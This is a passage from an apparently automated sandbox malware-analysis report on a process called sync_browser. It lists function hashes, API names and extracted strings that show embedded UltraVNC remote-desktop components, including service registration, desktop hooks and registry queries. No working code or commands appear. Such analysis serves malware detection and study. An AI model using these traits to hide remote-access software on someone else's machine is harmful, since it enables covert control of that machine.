                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                      • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                      • API String ID: 3943905059-2958163836
                                                                      • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                      • Instruction ID: 0fa908c333d2f8c8f9605c0ed547e91d93beb6954ab06c4982c8e7dd6f1f7c11
                                                                      • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                      • Instruction Fuzzy Hash: 14413F31A0868A86E724AB20F8643FAA365FB44F44FC40037EA4D97659DF3CE449C772
                                                                      Function 00007FF7E50ABF40 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteIconInfoObject
                                                                      • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                      • API String ID: 2689914137-3853778978
                                                                      • Opcode ID: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                      • Instruction ID: 001514af625d75af2ffc29e97a41a48e704dc3cd2d1c417f3b8906799b329e0b
                                                                      • Opcode Fuzzy Hash: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                      • Instruction Fuzzy Hash: E891A771B0868A89E760EF71A4603B9A3A4FB44F84F844436EE4DC7A59DF3CE545C722
                                                                      Function 00007FF7E50E0160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$Lock$AllocFreemalloc
                                                                      • String ID: Unable to allocate memory in zip dll
                                                                      • API String ID: 105282483-1808592719
                                                                      • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                      • Instruction ID: e1307e08ba714e4d099dbabdac4fc7f047e29f2f6b625eab10d5f330899ef170
                                                                      • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                      • Instruction Fuzzy Hash: 24717766A09B4A86EE11EF64E4603B8A3A4FF44F84F945136DE4E87358EF3CE541C721
                                                                      Function 00007FF7E5080E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 1145045407-2988720461
                                                                      • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                      • Instruction ID: ce7dde56dab1211b11a3a58ed1bcfdc6fdb1ddd71b952a326dac16bcb5d89044
                                                                      • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                      • Instruction Fuzzy Hash: F261973260478695EB20AF30E8607A9B3A4FF44F98F844136EA4D8BB99DF3CD544C761
                                                                      Function 00007FF7E5076E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                      • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                      • API String ID: 1137168859-3840687832
                                                                      • Opcode ID: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                                      • Instruction ID: da7df1eb2938c9492a6c06348b4aeaa15bd8fea463c85b5d14c3c36e10f57678
                                                                      • Opcode Fuzzy Hash: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
                                                                      • Instruction Fuzzy Hash: 71415031A0C74A81EB10AB25F461379E7A4EB85FD4FC41032E94E82A69DF3CE155CB62
                                                                      Function 00007FF7E5131630 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                      • String ID: .$:.
                                                                      • API String ID: 2522281643-2811378331
                                                                      • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                      • Instruction ID: ad079c3f8664ead60781585d8e67cbe2222061a51af81e341636daa759013f50
                                                                      • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                      • Instruction Fuzzy Hash: A0313D6694C28AC2E7617AA0A43137D95905F46F40FDA4037DA4CC668ADEBCE841C773
                                                                      Function 00007FF7E5082880 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85libraryregistryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                      • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                      • API String ID: 333848887-3586523739
                                                                      • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                      • Instruction ID: dac3e69ae9a5b5e5fa747cfe6275b5edef3300d8a739372a19510f49059c0a89
                                                                      • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                      • Instruction Fuzzy Hash: 76411920A18B4A81FA20BB25FC64775A3A4EF44F51FC45137D95E8A6A8EF7CA015C733
                                                                      Function 00007FF7E50A09F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF7E50A0AAC
                                                                      • x, xrefs: 00007FF7E50A0A25
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                      • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                      • API String ID: 3190128964-2508378015
                                                                      • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                      • Instruction ID: 6e596a91ba84a3feedf02f7192b4ca5a57b6ffafc783a887f1b49c70271dffa3
                                                                      • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                      • Instruction Fuzzy Hash: A2314F3660868A87E710EF69F46466AB360FB89F98F441032EE4E87718DF7CD445CB21
                                                                      Function 00007FF7E50A6D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                      • String ID: schook$w8hook
                                                                      • API String ID: 2828954817-2864610768
                                                                      • Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                      • Instruction ID: 94435fae07e1a10c41db56acda5a27d81290030bdf7b68ea616106d21f6ac847
                                                                      • Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                      • Instruction Fuzzy Hash: 86B16636A0878A86E754AF25E4506E9B7A0FB44F84F848037DB9D83755DF3CE485C322
                                                                      Function 00007FF7E5085EF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 171windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E5085FF6
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E5085FAF
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E5085F61
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E5085F1B
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E5085FC8
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E5086160
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                      • API String ID: 181403729-1081969236
                                                                      • Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                                      • Instruction ID: b7d66a23cdfbadeab87edbd2f3ff6618abb8c3b35da3c8e3a3bc29138901096f
                                                                      • Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                                      • Instruction Fuzzy Hash: D5612861A096C981E724BB25F4317F9B790EB54B04FC55037EA4DCB695EE3CD10AC722
                                                                      Function 00007FF7E5085550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E508564A
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E5085603
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E50855BD
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E508557A
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E508561C
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E508577E
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
